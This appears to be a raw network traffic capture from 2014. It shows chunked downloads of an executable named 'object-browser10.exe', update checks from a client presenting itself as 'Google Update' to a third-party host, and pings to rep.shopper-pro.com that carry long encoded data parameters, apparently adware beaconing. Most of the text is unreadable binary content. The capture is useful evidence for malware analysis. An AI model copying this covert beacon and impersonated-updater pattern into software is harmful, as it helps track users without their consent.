    X-Amz-Cf-Id: MZV_p2kXll8xEHSCqHWg_05eimJAasoaMfXDTUHcVnOlaMr1S4KHbw==
    ....%w[sXP........ .1.;@.vOR[y."I......hk....b.......D...tA0y.....Xe9.
    ....ZR..:.a.....".'....y..|0.<>.k)...=HSy".).:......9...Q..PxN.c
    ...a%...5..{bU;....cW.F.;'......w}.....B...2.<..cD.7P..vp7.^.......
    ...t.....*..y.|.]...../......Y.,.x/o......83......x].. ......^..uu_.E.
    67......y7XF.......%.l.wA..>..L......x...#I.....o`.......o..@......
    C...#.O....0*LY.........h.......{%;.....[...k.1jM.......|...S4.D\.....
    .......3hY<x=.j.}.^........V)[email protected][email protected]..@
    ..c..A..,.....%......_...|[email protected];<... .....pR
    ..._!-...JI.....`..2..j>... ....I}.N..c.af.0.....y.c...ba.....|.h.
    .L?..q.../.D.p~.........r.U.3P.x.A.........6ru......{.j..N.....t..u..o
    [.. ......58`U;.S......*.<..:...a..NT.hC.z..i......6....;U...~`..).
    ..KVU.WX..?w..5..]oN"L....z.t...C.7.....1r...D.gq...i...'....7....r...
    (t..|.T.,..........4.. ....!...)YfW...q......}O..7q_NI.....2Z..L....sv
    0u.(../-.j ...V...g.Ql%.3i...(..wqHz.=.o......tT1/......E.......5..A@.
    . ........;...".0.......2.........\..>.6...X.L...8g.02G..tq..:...WH
    .....A.-...7...;UBt..6E.*h...o".X.Q..~t. .$"D.".We..c.|.....7.\y.....`
    W.fA..... v....8..&...M ..#I..@........%5R.T.D\<.B..K../...[... ...
    ...7.%..2{hE..u...'.W....I ...P^.~..i..QmF...Sr....'[email protected].[u.~.....
    ... ............."..0..OE...}....-...[.M.,.(.~.%...s.7..7e..."........
    .%eJ.Q^S..I.N.l.....R.(...}4..#..3.....4l.)....|.q|....e....e.d......
    .....u.......,..P.}> ....(.C..W.u...$N.......sp(_3.mo#.B(..../..Q.1
    ..{@..U...A..M.'.."KT.V.EB.....?.4.....Y..].........sX...c...Ot...

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=2500000-2749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2500000-2749999/5945624
    Age: 22300
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: LceDhIMzKdApRW6nYXJSWwGvaIMWqg2hnYGgEkTnDdN1iBLlGU0Wnw==
    ..t.b./z.>.'d..w.}..s~.|.Q.Z.....R..kR.*.>N...'s........4^...,..
    ..Y..W}.-..:...$-.{8v?....S&j..*T_.F..l..e.'.3i..%......?GTE......L..0
    ..g.*..(1......i8A.X]4.0......8.l..0-H.S.H9.uC.............ul....j.kC.
    .[..|.........d.D.W..^p.A........S........P.lS.......Q.H..r|k...B.kE.3
    ^.."w..I><.b*....^..X*.....%..e.m....h.0g......9.U.d..C.E..F..5.
    _K?"....u.1.y..uA..tO.L......<...l.=.[.y(.r........e.....).}.9..eW.
    ...._.MO.e.....2~.l.H..:Y...C..x..i.3...YW.f...{c.<K..-........%...
    ............S.4ek..<...[S... Z.>d.O.2.ni`..{./..q0....8...0..3x.
    ...........A.a.r(.&n...J..z.....U.....e............t\..._)Y...O..{.z.H
    ..<}.C...o3.`}z...^E......;.....e]..hh..[......(...x....9......V...
    T..&(C...b.....,J...Y.:....].7KYQL..].t...*......c[.D.Jq7c.;=...7>z
    ].x...a.....#.<.n.....Q...=...,..Z#....6q.......8M..... K.l..#H..e.
    .V.i.$........c.m....nl.e.....,..$..`....._..O...\f._.lx....`p<B.9}
    ..W5........Y.on-....(.......9.}LH..c^.q....JN....s]x......8.....I...G
    ..>....|@.....f6...WP/.v^.5..&...c.....v0H(.1...Kx.).Y. c.n..l.B...
    p.z...).8.0>...EH.... Bf...\.........[.|..1.JB..u.".Gb.....<..3M
    .t...y/N..kB../..x...{..../...o.8QFp.1....k..)..8:VQ...G.V<bk...N..
    9._\...R...|.m.E...P..b?~..L....4.z...X......K.t..NZ.m.\.....o....h.|
    .*...#Z.;....:..k....Kg..jO..S.K....=zS. ]x7.%..~"..Qj4...`X8..76.|..j
    ._...0.>f....RY.>.#.. [email protected]..].....{I...g...1Qo|f..U.
    .!Zs..w.x.hv?......$.......E..D|....v.sf.w.4.T.d?.d......8.r...\......
    ..8Z.u:%j..`.Y9...r.\..ViT\.]..6...oL.......J.-..)..(`[email protected].

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=2750000-2999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2750000-2999999/5945624
    Age: 22302
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: GI5e1zzBSr0XYP1cjSeiPKo8W-_1TGK8P-cRBzzEB_-B2khvzN92YA==
    .hz9e.......[.{.s|g-.mY\l.R..B.t.B^.U.....wME.e .....J..'..j...I."p...
    $:.CI....$...L'......=R.*."..-.1..i8.T;.;. &.*......6b.o.!.....V.5....
    T.EK._..[...Y...d....z......%...B.I...Y..1..R.]:.Dd.{....f...l...,5..1
    .Q...O.=.).eO.g.U..c(8.I#[email protected].:............-..V.D.3).E>
    ;j..c..D....f6f<.n....!.l......H.A~..."...3......'(.......xO..Zk.!.
    k..`vJ..l(._.',".d.9.C'<.y..;.]..J [email protected]..^..>.z.:..
    .D...E..........m.4.g%...7-.o-....,.F.9lA..N.O6...d2.^....:fI..m~...q.
    G.,.bK...[[email protected]......._)....T....[..."....K.=a.N..,..7.]}..b.g..S.
    ....l...l.....fw..OY...Y`v.Z..uc.,.Eg-r.RR..L.!.`......cr.....t.....@n
    .....S..X.8..B@S4......>!......_.\..>N..vv:.O...........&$..N.\.
    .R..2@,..%x..n3h.F...<jgb.K..y>a....1...f.!Qf..7T..P/[email protected]
    .f......%....@*7.8a.....vd.9......o..e..b!.c.z.&.ce.Sl....?.]mk...y.C.
    ...."*..5aZ.....g.......#%1...q..H.y.}......`A.e .b.D.5.b.kB.....1S.f%
    2.d.{.P.n. a ...h.....'.1Y.....o......Y[.C.W]V.O..of....#8 3R\...F..=.
    .......v.._...&.y .Zlr............ ."&.>m.C......i}Qn4 s.n3....H.Ix
    ...a6.$.B/.......4..4..^.......TE.T}J`Z...G.N.*}N..%...S.fmiN.M.$..M..
    u%).1u<....wd..L-.6.c..=OcMd.....?i..P....t......H^...o...N.d.N.f..
    ..92=.V..T.....h...T...o.>[..).A.21..[EE.7..).d.B_..S\....-d3S....&
    lt;....2I?.z.~...d..a.<.2}!E......(...A..........kSo..|...L.......o
    P-*.F....xW.x.... r&e~(../..~.......e...^G^...i.Q.G!g4.,......Q.VV..@.
    8.%4|A...c....`..]........g...........b..Z.y0....Hv.y...|........t..00
    P9.*e.\..V..s.,.Z...6.UD.TJ..z.| 84....i.z.a..8..._..k.i0...a..;{.

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=3250000-3499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3250000-3499999/5945624
    Age: 22304
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: X25azohjTRMjnutQdDg3a-yDPl7d0Q1mVS1iAL3Qxz-v9fJSn9TDng==
    .]y..wA... r....7.L.T...t...d`[email protected].....~^.......e..%..AQ..
    O...N........... >F...o....;&.....&X..OI.t...o....N.2.[K:` L...9'.J
    .|...W..W.....f...vw$*..-.U...:.}X......7$../.i....D'.z....8}...n3. ..
    .s....C}.lmnOw.X.Be..*D...(d.wF......~^..-V..fc..w...A`..u.*...S..z~7.
    .....t..W.......S..2..VO..a...1:1.......<eI.qC.../C..........:B...9
    "......aH....u..!.1....w.....9.^.......1.............=...D.:..X]...5..
    .F.E.o.........8....o...r)#.A}O.q..H.,..#[email protected]./#..
    ..i5\...{q.E.........)...Z.........o.}g. .l.Rn.....c8e..q..B.... O....
    {.....W.....5v.b2...@..(..N.=..r..."....6Rb.i^r...87..<.h......#E.N
    ........9....1.K.B.: .dY.[.u"....X^....Y...n......... .:K.U.W.&.>..
    .&\$.#.!_p.. .....X..............x"....*A......@e{~..........3...u....
    .B.....x.EP....|..&...r......z.~.......$..ib...".<3./@..P... ..!..[
    .)...m$..=j.n...L.u ..?BeM>.@. v.......&#...J..].. ...eo....VcN.vv.
    L..H0dL...d.%.#~....c..x..;.....w7....|...VL...GP..y.>..G.....]>
    .8....t....W.8...f.....l..n...a..cx%.p...#.-/.q..un..1X..w..,8...1...d
    y/{Zr.......d..4......{GR....p...8E....o.......>...\p........?.....
    I...Oxp..hG. ..8.^NT-....P.tE.h..N>.j.. n"..!....ts..)..'.$vR....PT
    s...Z..5.."..W4.-...NtQ.-a.P......o....m.yj|.x..RH.?..*_.....o.......
    b..07.....'v.Bd...7.~[~.....2...T::".:.........M.$,.....][email protected]%..z...
    ..I...*...U.....r...,F...Y [email protected]..|\.]...E..
    qbc..t..m...E.[i...^..P..Z.....(-.ci\....v.6.y=.....c*f.>.....;9..j
    $.`.oN.s...7.>...R......^....T....BC8.t.f.j..... ..X..Dg.....&l

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=4000000-4249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4000000-4249999/5945624
    Age: 22308
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: fxNEZFUA9XZdYXPu8z_b9QSpJCMLwSQsEUDIgG4WmU_ag4GdlkoGnA==
    .p6&]&..E>b.d..Ec0...T?.J....l9r.l...h..s..AN.....F...<J...L....
    .Ux.. ....=..@{.?.I...;.6.....1?......8.h....FF......&X.@.]j.:......*.
    K..t.....Bt.(.jra?2 ..t...}...u.h......P.F.b..&......Z.......X...U...5
    .m75D..4O.P...1..97...('l....`/.7.$..K..\...2Z7"..j...x0T|!A_..}.^....
    ...3.....>.K...f3.]."3iz4.......y>C......(... ... ..1w.r1R....c.
    ....."a...#d^.=/Q.......L..6.\....K......T..~.t..<^YCO...W........f
    ..7r?...5.../.a.9..d....=.....^..<"..vmw...h.`..9*'sOU....C(qs...&g
    t;.Q..d........q.G.mh.OFg8<d........b.ys.b)...F)`.n3.....(o.xR.]...
    .....E..d_.\>o....)...w....=6..z.D....[P".#u....3.8]..P.G..m\vT)..&
    lt;.1...p..[...G...y..K...T.........sb.Eg(..........P|...a.......e..6.
    ...r.@..:aNr.!..W.....P.<...>(Gx...uF....hAz.a.$..U..... .....4.
    . ..X..#.N~.(O$=...dc.-.....5.|.D>._i..........<(.....7..0..V..#
    ....;hP......K..E....C*..2f.;..n.d.g..._$pd.a. .s)u...x.C.....,......6
    ........*.F.V..~....~...-..7.5.>(..f .31..aTv..WK....J.C.....4.g...
    vA........ qe....H..jT0.....<..1..,Zb6.9#.....aA..d..8.Z.e.........
    Lj!.y.U.-O..G..%.......|..".~.....5U.&$_}..O.&|.1..E..g..)...{1X...<
    ;P......MLm....... .... E*Z?...n.X$..$~..n..W.v....s.]I..V...$....b..}
    P...D.}..(."g,$...MF~o.....B.?B...M0.9..|P.....J`.......4......R..Z%..
    S.7.....Y....pb...z/.......Z..Z"X){."....-..o:.r..u.....L.Y....f../u.s
    .{.r.6..%...<x|.{.`....!....n..qzUh.QX:...i7ui&!.A.d...l.ir./ U...r
    ...."Sm..?..gw#..`...9O.Q..@#(.[...j..:$-_0.>1..~.......0.....oE...
    .".4.BH-|<[.zLw....!A1c.q...~....O..!..)..#U.un\..[......}.]...

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=4500000-4749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4500000-4749999/5945624
    Age: 22312
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: xYB5Sq172DpRs5wEWgvXro7YLkrknaGISmsw4rGDn0WhhFn-5l8wpw==
    ....jznt..].c..c....9.uo_.....x..K?S... r&.....).jf.$_....-..p.c..A...
    |.B....9...vB...H#<O..|.|...c.k..{.y........4[(.<...Y...........
    ..[....R...q0.-..T.J...V. z.}.k..C..p.!~..\.......#..v...n...Fd..n`...
    Y..,:3^..|....B./V......R..O.S.T5.p..pL......^M(.........8......... X.
    >1..Q.....U.......{..S.UK.y..].....w|.........,......@.>.*...-..
    ....E....q.?.......h._d$...kh)...'........p.PJ..I5\.c.o.. }.S.Z.....Z/
    ...!.....|...........S..Im.%9..&..vp...?[t.. .1....[l..!..^....../....
    v.....0...,..v..8b.........((.bl....*.1.!..).4...Pz....;!.5.......stc.
    ._3..Y8..o.N.1.z..JB....*.\.gRS.'..5**.`.3.sq..p .....V......].b#^..`!
    1t ?T...8..E!..3.....R....,..n./...&..mKc..DtE...u.......&.^..#..L:..1
    ..w...w|..0...*&..A.....%.UJ......^....P...T[2..$...8..10I....%.\.,.S.
    )R.JB.Fk.]f....O.L7..m|@t?Z;.l..U....}.2....Yr4.......H.7.].A....z....
    ..V"F....8xC...$.v?E.`..XH..........>.......m.]...\....\.%.......0.
    &.....E......v......v...Lt*[email protected]".!....
    @.%..?....B%.w...w.....c.....E..."..F.%.5ExeJ..W...6A....)S.r..nO.l..!
    P/...TaJ.e[C.Q.....fY..|%..A........%.h6;...P\.d..-..pF`.......Urf..y.
    X..3....Y......t>.o.:bu{..e]d..J6..W&..e.V0....aSX4QrF.M3.)s.C...S.
    bO..3B.....y#[email protected]"m......?..C[Sj.}....d ...
    .{.<...,4$..;$...L.aD.....`4R. ..."99..g..X.)...........x...9.e.Gk3
    \.v.k. ... fFqT,.....a.....~..|.}.O}..W.(...m..Ywj,.g........G...wE.o.
    m N./5.#8..:B....]u_Q.f.u...s..N..KA`#.H..];.tH......q-....:C.Y.y.....
    ......Nn..........m..$..P.e......<.s..4._....../..[nU..2']..$n.

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=5000000-5249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5000000-5249999/5945624
    Age: 22315
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: LBFdNsvJzSZSOzJ7iCMjwS1omkX4ki5HUUEnXqcpyJSBY3VE1J1qPg==
    .D..UW.....,R...G...>~....ph.../.-..]..w..Z.....O.cA...k.p..}....L.
    ..m....D..Q.88..#.Z...I.SS....j.l...W..M...IC.PW...7..z....[.nkg....B.
    xI.-."......~."Q9Y.HP...M.....<.......6.Zl.'...v.U...Y.....<..ss
    .:....(..i..r..3|..I.5....4n..9.{.m...wt.Q.......B~.d.W...u..Q.y>.b
    .;..p....s.P..[N.....$.......:87/.)....;....r.....d........0\f.*M.....
    ..N.8.R.f.b.......".6....l<.&.....t]..ii./.8..x_..EG"..lgq..A.Rz...
    m....M,G....3.n4}DU...PY.[zN3..@[email protected]..%..;f.........E..*
    ..9...(N.hE.'..q......Q....S..O...4..e.tr.(.s..x)..^.]...:.7.l.<..Y
    [email protected].`P/.....(..fpu.3.m...0....7.i.9.UD.?D.s..*f...;
    [email protected].. I.$..E2...0d..O$.4Q$}.,....h-..i...W.2S.c.......Q0..>.r
    W."C.....My!.Y.....5.f.}[email protected]...,...n...y..E...L.{.{.2...e./R
    .@.'G5..g.3.:`..>.uJR.!R......l9..:k!..0...NN....B...7..c..`uq..i..
    V........j_B..7.._.......fZ= ..q.UG.}|..X...8...<u..'./:/O.......lp
    n..i?.R..g...6...p...D.=}./).s.w..M..Z.."...{k>....&]..HC.....d.A8.
    .!.............D .q.5...I(P.n....$O.....e'6.[;l\i.T..k_.@kmx3[.c.g...3
    ..9x'........v....'Zj......q..A"..U6..E..f. .....Kf..#.....`.h.,@.l.#.
    ..xj.`96.:..%|[email protected].]9...M.J.....................
    ^8...P..bZV..P...c.^...y5.dy..&.a.8.=.N8g.vJ..T]0*P..,...6........7...
    m.....W.K^...QY....o..A....a^......3......q.v...'..F.miy_....AiRs....s
    .......9W9.*H..Q.J8|c.\.|......S. ..^.r.sLG......r=9.XB.,..5.d;..%q...
    .l._G.2v._.H...oFN5..&FH..ef..D.....:....e.2I.w.w-..D..U>...F=.....
    3.m......... .........$G..w....mRG..]...:j...............`.(.p....

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=5500000-5749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5500000-5749999/5945624
    Age: 22318
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 0SghfEBQe4vsVwx6SalO3LFahfqimYReHuVRJmlrE7dFnXIvOWbviQ==
    ....b.h...m5..8"f...WF.FCzpU.z=.G..e:....:.Z.\.8...^..?].|..5"..2.....
    .......H..'..h.naNQ..4....'.Z.E.m....*$u[.2.L..n..9m5..?.m(.!/..~..R.g
    ...U7.6.8..v.P......0".......#.0~.W.D..uT....w.|..rkf./......R.......*
    .u]....w.@<..2...r....r..\[email protected]..'>-...(...).?.q.....
    TS.. .!.....S.;%.[/. .(.....b7P?[...'......S`....~._.v.......a{d.....,
    .....z...3.......cb...a..._}]*.G*yi... b1....n..s..5o87..i^......sm.h~
    ..........B.....(.do.6.........V.$...`.=......r.../c%.3.|?6.q.C.{..y..
    = .F;..k.7..N.i......V6..*..%....y1...v.q.i...U.<..>..aA...E..g.
    aT. ...;.....W;[.t,.....U....d....T.#.....I;.3)....q*.%.4>.~L.(..ua
    GVy......3.5..........W...uo....w1[......3...wt..p..{........}.!....TB
    ....&.v../..Nn..|......J..P./N...8...L.....@i%..f.k.)5...>.........
    .0E.&..?..q...J.O.f..W....9eJ..l.g...i.]..d....7.ie...!k.>..O.#`...
    SLb..%.a..L'..4...0...?< ...p.M.|.w.m...(A.z.1.g.....u...\.......I.
    ~cU.....Uh'..X.#.HPN......G.CjRf......Pa....QC.....=V!.$'N.....jv..\6.
    ... k0q......J....}X.>..F#..$R2S..5.{.L.....A5........../C1.K.....@
    @)......ze>J...z#.........Xl....w(.H..b.P.........."....5.....D.&.]
    ..Ts.%`..d6.s.i.K..|.Mj.y......"[email protected].%.Y:d.[...^.....&..
    ...._...h....S.....%(uXLPg../R."....0?.SJ.$.....r.;.c.l....W....{O....
    .]...~.".i.>,..[.}._.FIU.!......*2&.-..0....j.........M.......f1.,.
    .v.*.G..,|..R-.f......t.;.oq....s.8L)B..,.......l*9..H......y....g5v.9
    D0J|.....(.4.../.............s./X..(.O.z.g&..F...K..N..&I.!...W...=...
    W.......l.6...UC.SZ.U..(.....i.t.n.U..p.#...,..x...........%....a.

    <<< skipped >>>

    GET /omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/update.xml?rand=24808&w=3:YP9H98JGonPq-z8K8ZDNEoBZF0_1DKLBOVchsmR1rKhzvo080SvcrbvVqO024phbkOXhv8Oj8EjHaL0anoDmMXwRuezydLQrfC6FVKLMOqXspCJqg8Sq6V9oCpSjkralK86J5UI4Ao4LnhS5nqLPx1I9muwRfYQ3SIN5JeFyDjE HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp;cup
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    If-Match: "EdZ7r8xWhZgJSDd_8pRZATwPcQc"
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 412 Precondition Failed
    Date: Wed, 04 Jun 2014 18:55:30 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1400143352"
    Last-Modified: Thu, 15 May 2014 08:42:32 GMT
    Cache-Control: max-age=13197
    Content-Length: 403
    Content-Type: application/xml; charset=utf-8
    X-HW: 1401908130.dop010.am4.t,1401908130.cds055.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56508"/>. <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    <updatecheck status="noupdate"/>. <ping status="ok"/>
    . </app>. <app appid="{dd1b4183-f36a-4489-9a68-4205a6801149
    }" status="ok">. <updatecheck status="noupdate"/>. <
    ping status="ok"/>. </app>.</response>.
    ....



    GET /omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/update.xml?rand=24808 HTTP/1.1

    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x8004219c
    X-Last-HTTP-Status-Code: 412
    X-Retry-Count: 0
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:30 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1400143352"
    Last-Modified: Thu, 15 May 2014 08:42:32 GMT
    Cache-Control: max-age=13197
    Content-Length: 403
    Content-Type: application/xml; charset=utf-8
    X-HW: 1401908130.dop010.am4.t,1401908130.cds055.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56508"/>. <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    <updatecheck status="noupdate"/>. <ping status="ok"/>
    . </app>. <app appid="{dd1b4183-f36a-4489-9a68-4205a6801149
    }" status="ok">. <updatecheck status="noupdate"/>. <
    ping status="ok"/>. </app>.</response>.HTTP/1.1 200 OK
    ..Date: Wed, 04 Jun 2014 18:55:30 GMT..Keep-Alive: timeout=10, max=100
    ..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1400143352"..La
    st-Modified: Thu, 15 May 2014 08:42:32 GMT..Cache-Control: max-age=131
    97..Content-Length: 403..Content-Type: application/xml; charset=utf-8.
    .X-HW: 1401908130.dop010.am4.t,1401908130.cds055.am4.c..<?xml versi
    on="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="pro
    d">. <daystart elapsed_seconds="56508"/>. <app appid="{4
    30FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatech
    eck status="noupdate"/>. <ping status="ok"/>. </app>
    ;. <app appid="{dd1b4183-f36a-4489-9a68-4205a6801149}" status="ok"
    >. <updatecheck status="noupdate"/>. <ping status="o
    k"/>. </app>.</response>...

    <<< skipped >>>

    GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=24801 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:28 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399825872"
    Last-Modified: Sun, 11 May 2014 16:31:12 GMT
    Cache-Control: max-age=12418
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908128.dop002.am4.t,1401908128.cds032.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56754"/>. <
    ;app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">.
    .<event status="ok"/>. </app>.</response>...


    GET /app/ping.ashx?e=QgW8pN5r26bG3E  YywYlU3f2Ttd /xl xYuH J FObZhN5o5pkk8XKxIhAz9Yyqxh8Nod/d7v1zgXkPiNglaWs6fOuor3FnHdLO8X QXbr lPuSoguSWxrRu4kWrXNynl1xOKDZuhV32iCW81wbGIKsBnpxnODFqF2K7v3Wx4ONmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw136MSsEaSIOanTjS7v eG62Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSdoYj746suyshjZ3jwf MfnewapHV13X4JiBsOrYTKodleI3B6uYg8lqpwuyqc3XiTEOgAi5qcHFTOb4ld8V/hpKFlcuSjxCVQ== HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0
    ....



    GET /app/ping.ashx?e=jJl6mEdycnQ 8U9Mk34kw7XExPxaOtUo 0R MP RL3UJOLXkS9L/hwjFxjCJ4rJf9G51DmHdBK7t7iAM5gjoAOfZECWycqr1Z18OnkUdu7xEOSUa7Yc3q/tSqyRFQDmNQo1niQhmz6uvbe1EY5FvJ2p040u7/nhutmYLGrLnKtzqGJso3uNVsUyXtRkPjEY dEwbzXa6B0mlKK9UPlQ5p3VDt5v69KnXUp6IEQMqXjdV4mPrhpbEZ5iUvwkrSyY3sqfoz2uHEz1UMgf1RchOnpAvYXSGDVGJe0b37/par5UWUV8ePZ0Sdc67jG ds7hv51kSquqcSceqsk5wIEKmVWDyyarmb um8WhF3ugr H9AjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF Jihgvev7iJ046K60oDM11bbdPpuGYiwKKAUjnBK5teTHDSzCAjSAeoSV Ydh9Uq5zKgLBmWbNzqz9A8dpvtBeO2hc3DbjNrW8PhalNGReGDudXf8s99rZqrmh5G7kLgKqRaV67pS3nBkkuGbiMqeAsg9JWacyDbfAA== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0
    ....



